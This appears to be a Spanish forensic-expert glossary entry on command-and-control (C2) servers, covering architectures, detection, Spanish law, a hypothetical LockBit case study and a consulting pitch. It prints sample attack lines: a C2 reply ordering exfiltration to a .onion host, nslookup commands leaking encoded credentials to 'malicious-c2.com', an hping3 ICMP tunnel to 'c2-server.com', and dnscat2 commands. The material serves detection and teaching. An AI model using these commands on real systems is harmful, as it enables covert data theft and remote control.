C2 (Command and Control)
Servidor o infraestructura de comunicación que permite a un atacante mantener control remoto sobre sistemas comprometidos, enviar comandos maliciosos y exfiltrar datos robados de forma encubierta.
C2 (Command and Control): Infraestructura de Control de Malware
El 94% de ataques de ransomware exitosos en 2025 utilizaron infraestructura C2 para mantener persistencia y exfiltrar datos antes del cifrado, según el último informe del CCN-CERT. Esta comunicación encubierta entre el malware y el atacante es el “cordón umbilical” de ciberataques avanzados.
Entender cómo funcionan los servidores C2 (Command and Control) es crítico para análisis forense post-incidente, respuesta a brechas de seguridad y litigios de responsabilidad por negligencia en ciberseguridad. Desde botnets de 100.000 dispositivos IoT hasta APTs gubernamentales con C2 en Tor, la infraestructura de mando y control define el éxito o fracaso de una intrusión.
Definición técnica
Un servidor C2 (Command and Control Server) es cualquier sistema informático que permite a un atacante:
- Mantener comunicación bidireccional con malware instalado en sistemas comprometidos
- Enviar comandos remotos (exfiltrar archivos, instalar más malware, ejecutar código)
- Recibir telemetría de las víctimas (credenciales robadas, logs, screenshots)
- Coordinar ataques distribuidos (botnets DDoS, campañas de spam masivo)
El C2 es el centro nervioso de operaciones cibercriminales. Sin C2, el malware queda “huérfano” y su capacidad de daño se limita al payload inicial.
Diferencia clave: Un backdoor es la puerta trasera (el malware instalado). El C2 es el edificio al que conduce esa puerta (la infraestructura del atacante).
Arquitecturas de infraestructura C2
| Arquitectura | Descripción | Ventajas atacante | Desventajas atacante | Ejemplo |
|---|---|---|---|---|
| Centralizada | Un único servidor C2 controla todas las víctimas | Simple de gestionar | Único punto de fallo, fácil takedown | Zeus botnet (2010) |
| Descentralizada P2P | Cada bot puede actuar como C2 para otros | Resiliente a takedowns | Compleja de implementar | Gameover Zeus (2014) |
| Jerárquica (tiers) | Proxies C2 intermedios ocultan C2 principal | Dificulta rastreo del atacante | Más infraestructura a mantener | Emotet (2019-2021) |
| Domain Fluxing | DGAs generan miles de dominios diarios | Dificulta blacklisting | Predecible algorítmicamente | Conficker (2008-presente) |
| Fast Flux | IPs del C2 cambian cada minutos (DNS TTL bajo) | Evasión de firewalls | Costoso (muchos servidores proxy) | Storm Worm (2007) |
| Cloud-based | C2 en AWS/Azure/GCP con IPs legítimas | Se camufla como tráfico corporativo | Puede ser detectado por providers | APT29 (2020) |
| Covert channels | C2 oculto en protocolos legítimos (DNS, ICMP) | Bypass de firewalls tradicionales | Limitado bandwidth | DNSMessenger (2017) |
Técnicas de comunicación C2
1. Beaconing tradicional (HTTP/HTTPS)
El método más común: el malware contacta periódicamente al C2 para comprobar si hay nuevos comandos.
Patrón típico de beaconing:
POST /api/v1/check HTTP/1.1
Host: legitimate-looking-domain.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
Content-Type: application/json
{
"client_id": "7a3f2b1c-4d5e-6f7g-8h9i-0j1k2l3m4n5o",
"os": "Windows 10 Pro 22H2",
"hostname": "DESKTOP-VICTIM01",
"ip_internal": "192.168.1.105",
"privileges": "admin",
"timestamp": "2026-02-10T14:35:22Z"
}Respuesta del C2:
{
"commands": [
{
"id": "cmd_001",
"type": "exfiltrate",
"target": "C:\\Users\\*\\Documents\\*.pdf",
"endpoint": "https://exfil-server.onion/upload"
},
{
"id": "cmd_002",
"type": "lateral_move",
"target": "192.168.1.50",
"credentials": "admin:P@ssw0rd123"
}
],
"sleep_interval": 300
}Indicadores forenses:
- Conexiones HTTPS periódicas a intervalos regulares (jitter entre 5-10 minutos)
- Certificados SSL autofirmados o con CN sospechosos
- Payloads JSON/Base64 con estructura repetitiva
- User-Agent común pero timestamp incongruente con actividad usuario
2. DNS Tunneling
Técnica que oculta tráfico C2 dentro de consultas DNS legítimas. Como DNS rara vez se bloquea en firewalls corporativos, es efectivo para exfiltración lenta pero persistente.
Ejemplo de consulta DNS maliciosa:
# Datos exfiltrados codificados en subdominios DNS
# Payload: "admin:password123" → Base32 → MFRGG2LTNFZSA2LTNFZSA3DFON2GS3LF
nslookup MFRGG2LTNFZSA2LTN.malicious-c2.com
nslookup FZSA3DFON2GS3LF.malicious-c2.comEl servidor DNS del atacante (malicious-c2.com) recibe los subdominios, los decodifica y reconstruye el payload.
Detección forense:
- Volumen anómalo de consultas DNS (más de 100/minuto desde un solo host)
- Subdominios con longitud excesiva (más de 50 caracteres)
- Entropía alta (datos codificados Base32/Base64 parecen aleatorios)
- Consultas a dominios recién registrados (menos de 30 días) o con bajo ranking Alexa
Caso real: En 2020, el malware DNSMessenger (APT) usó DNS TXT records para enviar scripts PowerShell completos. Un solo TXT record de 255 caracteres puede contener código malicioso fragmentado.
3. ICMP Tunneling
Oculta tráfico C2 en paquetes ICMP (ping), que muchos firewalls permiten para diagnóstico de red.
Payload oculto en ICMP:
# Comando del atacante codificado en payload ICMP
echo "cmd.exe /c whoami" | base64 > payload.txt
# Envío vía ping con payload custom
hping3 -1 -d 100 -E payload.txt c2-server.com
# Respuesta del C2 en ICMP reply (data section)
# Output: "VICTIM\Administrator"Indicadores:
- Paquetes ICMP con payload inusual (más de 64 bytes)
- Pings a intervalos regulares pero sin pattern de monitorización legítima
- ICMP a IPs internacionales fuera del scope de negocio
4. Steganografía en imágenes
El C2 oculta comandos dentro de imágenes aparentemente legítimas publicadas en redes sociales o sitios comprometidos.
Proceso:
- Atacante sube imagen a Twitter/Imgur con comandos esteganografiados en LSB (Least Significant Bits)
- Malware descarga la imagen, extrae comandos con algoritmo preestablecido
- Ejecuta comandos sin contactar directamente al C2 (covert channel unidireccional)
Herramientas:
- Steghide: Oculta datos en JPG/BMP/WAV
- OpenStego: Open source steganography
- Outguess: Usado por malware Regin (NSA)
Detección forense de tráfico C2
Análisis de logs de red
- Exportar logs de firewall, proxy, DNS de los últimos 90 días
- Filtrar tráfico saliente a puertos no estándar (8080, 8443, 4444)
- Identificar conexiones a IPs con reputación baja (VirusTotal, AbuseIPDB)
Detección de beaconing
- Buscar conexiones HTTP/HTTPS con periodicidad sospechosa
- Script Python para análisis de timestamps:
import pandas as pd from datetime import timedelta # Cargar logs de firewall logs = pd.read_csv('firewall_logs.csv', parse_dates=['timestamp']) # Calcular intervalos entre conexiones a misma IP logs['time_diff'] = logs.groupby('dest_ip')['timestamp'].diff() # Detectar beaconing (intervalos regulares ±10%) beacons = logs[ (logs['time_diff'] > timedelta(seconds=50)) & (logs['time_diff'] < timedelta(seconds=70)) ].groupby('dest_ip').size() # IPs con más de 100 beacons en 24h suspicious = beacons[beacons > 100].sort_values(ascending=False) print(f"Posibles C2 detectados:\n{suspicious}")
Análisis DNS anómalo
- Consultas a dominios DGA (alta entropía, longitud inusual)
- Volumen excesivo desde un único host
- Consultas a TLDs sospechosos (.tk, .pw, .gq, .ga, .ml - top 5 de malware)
- Herramienta: DNSTwist para detección de typosquatting
Inspección SSL/TLS
- Certificados autofirmados o con CN genéricos (“localhost”, “server”, “test”)
- Cifrado débil (TLS 1.0, ciphers exportables)
- Certificate pinning que falla (malware espera cert específico)
- Uso de Ja3/Ja3s fingerprinting para identificar clientes maliciosos
Correlación con IOCs
- Contrastar IPs/dominios con threat intel feeds (MISP, AlienVault OTX, Cisco Talos)
- Buscar hashes de malware conocidos con comunicación C2 típica
- Correlacionar con signatures Yara de familias de malware
Herramientas forenses para análisis C2
SIEM y EDR
| Herramienta | Casos de uso | Detección C2 | Coste |
|---|---|---|---|
| Splunk | SIEM corporativo, correlación de logs | Detección de beaconing, anomalías DNS | €1,500/año |
| ELK Stack | Open source SIEM (Elasticsearch+Logstash+Kibana) | Dashboards custom para análisis tráfico | Gratis |
| CrowdStrike Falcon | EDR endpoint, detección en tiempo real | IA para detectar C2 nunca visto antes (zero-day) | €8/endpoint/mes |
| SentinelOne | EDR con rollback automático | Bloquea comunicación C2 antes de exfiltración | €6/endpoint/mes |
| Zeek (Bro IDS) | Network traffic analyzer | Scripts Zeek custom para detectar DNS tunneling | Gratis |
| Suricata | IDS/IPS open source | Rules de Emerging Threats para C2 conocidos | Gratis |
Análisis forense manual
# 1. Análisis tráfico PCAP con Wireshark
# Filtro para beaconing HTTP sospechoso
http.request and frame.time_delta > 50 and frame.time_delta < 70
# 2. Extracción de certificados SSL de conexiones sospechosas
tshark -r capture.pcap -Y "ssl.handshake.type == 11" \
-T fields -e x509sat.printableString > certs.txt
# 3. Análisis DNS tunneling con DNSCat2
dnscat2-server malicious-domain.com
# En víctima (si se tiene acceso controlado):
# dnscat2 malicious-domain.com
# 4. Detección DGAs con algoritmo de entropía
python3 dga_detector.py --input dns_logs.txt --threshold 4.5
# Output: Dominios con entropía mayor de 4.5 bits (sospechosos DGA)
# 5. Correlación IOCs con MISP
curl -H "Authorization: YOUR_API_KEY" \
https://misp.instance.org/attributes/restSearch \
-d '{"value":"185.220.101.45", "type":"ip-dst"}'
# Output: Malware family, campaign, last seenThreat intelligence feeds
Fuentes públicas para contrastar IPs/dominios sospechosos de C2:
- Abuse.ch (URLhaus, Feodo Tracker): C2s de ransomware y bankers
- Cisco Talos Intelligence: Reputación de dominios/IPs actualizada diariamente
- AlienVault OTX: IOCs compartidos por comunidad
- MISP Threat Sharing: Plataforma de sharing de IOCs (usado por INCIBE)
- CCN-CERT: Feeds de C2s activos contra entidades españolas
Marco legal español
Código Penal
Artículo 264.2 CP - Delito de daños informáticos:
Quien obstaculice o interrumpa el funcionamiento de un sistema informático ajeno… causando daños.
Aplicación a C2: El atacante que despliega un C2 para coordinar ransomware responde por daños (cifrado de archivos), siendo agravante si afecta servicios esenciales (art. 264 bis: pena aumentada a la mitad superior).
Artículo 197.3 CP - Acceso ilícito:
Quien acceda sin autorización a datos o programas informáticos…
Aplicación: El simple acceso remoto a un sistema vía backdoor con C2 ya es delito, incluso sin exfiltrar datos.
Artículo 256 CP - Receptación informática:
Quien use infraestructura informática para beneficiarse de delito ajeno.
Aplicación: Alquilar infraestructura para C2 (C2-as-a-Service) es receptación si se sabe del uso criminal. Proveedores de VPS/VPN con políticas laxas han sido investigados.
Responsabilidad de proveedores de hosting
Artículo 16 Ley 34/2002 (LSSI) - Responsabilidad de ISPs:
Los prestadores de servicios de la sociedad de la información no están obligados a supervisar los datos que transmitan, pero deben colaborar con autoridades para identificar autores de infracciones.
Jurisprudencia: SAN 12/2018 absolvió a un ISP que hospedaba servidores C2, al demostrar que no tenía conocimiento efectivo y retiró el contenido en 24h tras notificación judicial.
Obligación forense: Los proveedores deben preservar logs de conexión al C2 durante 12 meses (RD 1720/2007) para facilitar investigaciones.
Admisibilidad de evidencia de análisis C2
Para que un informe pericial sobre tráfico C2 sea admitido en juicio:
- Legalidad de la captura: Los PCAPs deben obtenerse de infraestructura propia (empresa víctima) o con orden judicial si es tercero
- Cadena de custodia: Hashes SHA-256 de PCAPs originales, logs de manipulación
- Herramientas validadas: Wireshark, Zeek, Suricata son ampliamente aceptadas
- Explicación comprensible: El perito debe explicar conceptos técnicos (beaconing, DNS tunneling) en lenguaje accesible para el juez
Error común: Presentar screenshots de Wireshark sin metadatos de captura (timestamp, interfaz, filtros aplicados). Los jueces pueden rechazar la prueba por falta de verificabilidad.
Frameworks C2 utilizados por atacantes
| Framework | Tipo | Lenguaje | Uso típico | Detectabilidad |
|---|---|---|---|---|
| Cobalt Strike | Comercial | Java | Red Teams, APTs post-explotación | Media (firmas conocidas pero customizable) |
| Metasploit | Open source | Ruby | Pentesting, PoC exploits | Alta (payloads muy firmados) |
| Empire/Starkiller | Open source | PowerShell | Living-off-the-land attacks Windows | Media (detectado por EDRs avanzados) |
| Mythic | Open source | Go | C2 modular multi-agente | Baja (nuevo, pocas firmas) |
| Sliver | Open source | Go | Alternativa moderna a Metasploit | Media |
| Covenant | Open source | C# | Red Teams .NET | Media |
| Pupy | Open source | Python | Cross-platform RAT | Media |
Cobalt Strike es el estándar de facto en APTs y ransomware-as-a-service. Su beacon es altamente configurable: jitter aleatorio, sleep times variables, comunicación HTTPS con certificados Let’s Encrypt legítimos.
Detección de Cobalt Strike:
- Ja3 fingerprints característicos (87b7e99202fd37534f999244d1b01832)
- Certificados con CN “Major Cobalt Strike” (versiones antiguas)
- Waterpipe mode (named pipes en red para C2 lateral)
- Beacon Object Files (BOFs) cargados en memoria
Caso práctico: Análisis forense post-ransomware con C2
Escenario hipotético con fines didácticos:
PYME española de 50 empleados sufre ataque de ransomware LockBit 3.0. Se solicita análisis forense para determinar cómo entraron, qué exfiltraron y si hay exposición legal por fuga de datos personales (RGPD).
Metodología aplicada
Preservación inmediata
- Aislamiento de red (desconexión física del switch core)
- Imagen forense de 3 equipos críticos: controlador dominio, servidor ficheros, PC del CFO
- Captura PCAP de tráfico de firewall de últimas 72h (antes del cifrado)
Análisis timeline de infección
- Día -14: Email phishing a CFO con adjunto Excel malicioso (macro)
- Día -14 (15:23h): Macro ejecuta PowerShell que descarga Cobalt Strike beacon desde
hxxps://cdn-updates[.]com/api/v1/update.dll - Día -13 a -2: Beacon comunica cada 60 minutos con C2
185.220.101.45:443(IP ucraniana) - Día -2: Atacante realiza reconocimiento manual (whoami, net user, net group)
- Día -1: Exfiltración 47 GB de datos a
mega[.]nzvia cliente rclone - Día 0 (03:00h): Despliegue de LockBit encryptor via PsExec a todos los equipos
Análisis del tráfico C2
- Se extrae PCAP de comunicación con
185.220.101.45 - Wireshark muestra beaconing periódico cada 60 segundos exactos
- Certificado SSL autofirmado con CN “cloudflare.com” (falso, intento de camuflaje)
- Payload cifrado con AES-256, pero metadatos HTTP revelan estructura JSON
- Se identifica Ja3 fingerprint:
a0e9f5d64349fb13191bc781f81f42e1→ Cobalt Strike 4.5
- Se extrae PCAP de comunicación con
Correlación con threat intelligence
- IP
185.220.101.45aparece en Feodo Tracker (Abuse.ch) como C2 activo de LockBit desde hace 8 días - MISP muestra 12 campañas previas con misma IP (sector sanitario y manufactura)
- CCN-CERT tiene alerta del 2 Feb sobre campaña LockBit con phishing Excel idéntico
- IP
Análisis de exfiltración
- Logs proxy muestran subidas a
mega[.]nztotalizando 47.2 GB en 6 horas - Se identifica cliente rclone en
C:\Users\CFO\AppData\Local\Temp\rclone.exe(hash en VirusTotal: 3/72 detecciones) - Archivos exfiltrados: bases de datos clientes, contratos PDFs, hojas cálculo con datos personales
- Implicación RGPD: Brecha de datos con más de 5,000 registros de personas identificables → Obligación notificación AEPD en 72h
- Logs proxy muestran subidas a
Informe pericial
- Vector inicial: Phishing con macro maliciosa (falta formación empleados)
- Persistencia: Cobalt Strike beacon con comunicación C2 durante 12 días sin detección (falta EDR)
- Exfiltración: 47 GB datos personales comprometidos (incumplimiento art. 32 RGPD: falta cifrado en reposo)
- Recomendaciones: EDR en todos endpoints, formación phishing trimestral, segmentación de red, backups offline
Resultado legal:
- AEPD impone multa de 40.000€ por vulneración art. 32 RGPD (medidas de seguridad insuficientes)
- La aseguradora cubre el rescate (€180.000) pero no la multa RGPD
- 3 clientes interponen demanda civil por filtración de datos confidenciales
Lección clave: El análisis del C2 fue crítico para demostrar que el ataque duró 12 días. Si la empresa hubiera detectado el beaconing en 24-48h, habría evitado la exfiltración masiva y la multa RGPD.
Contramedidas para bloquear C2
Para empresas
EDR/XDR con detección de comportamiento
- CrowdStrike, SentinelOne, Microsoft Defender for Endpoint
- Detección de beaconing, lateral movement, credential dumping
Network Traffic Analysis (NTA)
- Darktrace, Vectra, ExtraHop
- IA que aprende tráfico legítimo y alerta de anomalías (C2 incluido)
DNS Security
- Cisco Umbrella, Cloudflare Gateway, Quad9
- Bloqueo de dominios DGA, DNS tunneling, malware-known C2s
Threat intel feeds integrados
- Bloqueo automático de IPs/dominios de C2 conocidos
- Integración con SIEM (Splunk, QRadar, ArcSight)
Segmentación de red + Zero Trust
- Microsegmentación para limitar movimiento lateral post-compromiso
- MFA obligatoria, NAC (Network Access Control)
Para investigadores forenses
- Sinkholing: Redirigir tráfico del C2 a un servidor honeypot controlado para observar bots activos
- Takedown coordinado: Trabajar con ISPs y CERT para tumbar legalmente servidores C2
- Decryption tools: Colaborar con NOMORERANSOM para publicar descifrados de ransomware si se obtiene clave maestra del C2
Tendencias futuras en C2
1. C2-as-a-Service
Plataformas como Stresser.su (DDoS) o Ransom-X (ransomware) ofrecen infraestructura C2 plug-and-play por $50/mes. Impacto: Cibercriminales sin conocimientos técnicos pueden lanzar ataques sofisticados.
2. C2 en blockchain
Proyectos como BitTorrent-based C2 usan DHTs descentralizadas imposibles de tumbar. Desafío forense: No hay servidor central que incautar o analizar.
3. Malware autocontenido (sin C2)
Wiper malware y ransomware que no requieren C2 (ej. NotPetya) para evitar detección. Contramedida: Mayor énfasis en prevención (EDR) que en detección post-compromiso.
4. Evasión con CDNs legítimas
Uso de Cloudflare Workers, AWS Lambda como proxies C2. Problema: Bloquear estas IPs afecta servicios legítimos.
Preguntas frecuentes adicionales
¿Puede un C2 detectar que está siendo analizado en sandbox?
Sí. Malware avanzado usa técnicas anti-análisis: detecta VMs (vía artifacts como “VMware” en hardware), verifica conexión a Internet real (ping a Google), requiere interacción humana (clicks de ratón) antes de activarse. Sandboxes modernas como Cuckoo Sandbox o ANY.RUN usan bare-metal y evasión de anti-VM, pero el cat-and-mouse game continúa.
¿Qué hacen los atacantes cuando detectan que su C2 ha sido descubierto?
Migran inmediatamente a infraestructura backup (C2 secundario). Los grupos APT avanzados tienen 3-5 C2s de respaldo con diferentes proveedores (AWS, Azure, VPS rusos). También pueden “dormir” (no contactar al C2 durante semanas) para evitar detección y esperar a que el equipo forense baje la guardia.
¿Es posible engañar a un atacante respondiendo como si fuera su propio C2 (honeypot)?
Sí, técnica llamada active defense o C2 hijacking. Se requiere ingeniería inversa del protocolo del malware para responder con comandos legítimos. Ejemplo: Project Honey Badger (US-CERT) hijacked botnet Kelihos enviando comandos “sleep forever” a los bots. Es legal en EEUU bajo ciertas condiciones, pero en España roza el art. 264 CP (daños) sin autorización judicial explícita.
Conclusión
Los servidores C2 son el talón de Aquiles de ataques avanzados. Detectar y analizar tráfico de comando y control es crítico para:
- Respuesta a incidentes: Identificar alcance del compromiso y sistemas afectados
- Threat hunting proactivo: Detectar intrusiones antes del daño (ransomware pre-cifrado)
- Análisis forense post-incidente: Reconstruir timeline del ataque para litigios
Un perito informático forense especializado en C2 debe dominar análisis de tráfico de red, protocolos de malware, threat intelligence y explicar hallazgos técnicos complejos de forma comprensible para jueces y abogados no técnicos.
Para casos que requieran análisis de infraestructura C2, es fundamental contar con un experto certificado que pueda:
- ✅ Identificar comunicación C2 en gigabytes de PCAPs
- ✅ Correlacionar tráfico con IOCs de threat intelligence
- ✅ Reconstruir timeline completo del ataque
- ✅ Informes periciales admisibles con cadena de custodia
- ✅ Ratificación en juicio con explicación técnica accesible
¿Necesitas análisis forense de tráfico C2?
Si tu empresa ha sufrido un ciberataque o sospechas de compromiso activo, puedo ayudarte con:
- ✅ Análisis forense de logs de firewall, proxy, DNS y EDR
- ✅ Detección de beaconing, DNS tunneling y covert channels
- ✅ Identificación de malware y correlación con threat intelligence
- ✅ Informes técnicos para AEPD, aseguradoras y procedimientos judiciales
- ✅ Recomendaciones de remediación y hardening
Contacta para una consulta gratuita de 20 minutos donde evaluaremos el alcance del posible compromiso y la evidencia disponible.
Preguntas Frecuentes
¿Qué es un servidor C2 y cómo funciona?
Un servidor C2 (Command and Control) es la infraestructura que permite a un atacante mantener control remoto sobre sistemas infectados. El malware instalado en la víctima contacta periódicamente al servidor C2 mediante beaconing (señales periódicas) para recibir comandos (robar datos, instalar más malware, moverse lateralmente). Usa técnicas de ofuscación como DNS tunneling, HTTPS con certificados falsos o protocolos encubiertos para evadir detección.
¿Cómo se detecta tráfico C2 en análisis forense de red?
Se analizan patrones anómalos en logs de firewall, proxy y DNS. Indicadores clave: beaconing periódico a intervalos regulares (cada 60 segundos), conexiones a dominios recién registrados o con DGAs (Domain Generation Algorithms), tráfico HTTPS a IPs sin reputación, volúmenes de datos salientes inusuales, consultas DNS excesivas con payloads cifrados. Herramientas SIEM y EDR con reglas Sigma detectan estos patrones automáticamente.
¿Es legal tumbar un servidor C2 sin autorización judicial?
No en España. Aunque el servidor C2 sea criminal, tumbarlo mediante ataques DDoS o exploits constituye delito de daños informáticos (art. 264 CP). Solo las FCSE con autorización judicial pueden realizar sinkholing (redirigir tráfico del C2 a servidores de investigación). Empresas privadas deben reportar el C2 a INCIBE o CCN-CERT para que coordinen el takedown legal con proveedores de hosting.
Términos Relacionados
Botnet
Red de dispositivos infectados (ordenadores, smartphones, IoT) controlados remotamente por un atacante mediante infraestructura de comando y control (C2) para ejecutar actividades maliciosas coordinadas como DDoS, spam, minería de criptomonedas o distribución de malware.
Backdoor Administrativa
Código malicioso instalado en sitios web que permite acceso persistente no autorizado con privilegios administrativos, incluso después de cambiar contraseñas. En análisis forense, su detección requiere auditoría completa de archivos del sistema y base de datos.
Análisis de Tráfico de Red
Disciplina de la informática forense que examina el tráfico de red capturado (paquetes, flujos, metadatos) para reconstruir comunicaciones, detectar actividad maliciosa, identificar exfiltración de datos y documentar intrusiones con validez probatoria.
Movimiento Lateral
Técnicas utilizadas por atacantes para desplazarse de un sistema comprometido a otros dentro de la misma red, escalando privilegios y ampliando el alcance del ataque.
¿Necesitas un peritaje forense?
Si necesitas ayuda profesional con análisis forense digital, estoy aquí para ayudarte.
Solicitar Consulta Gratuita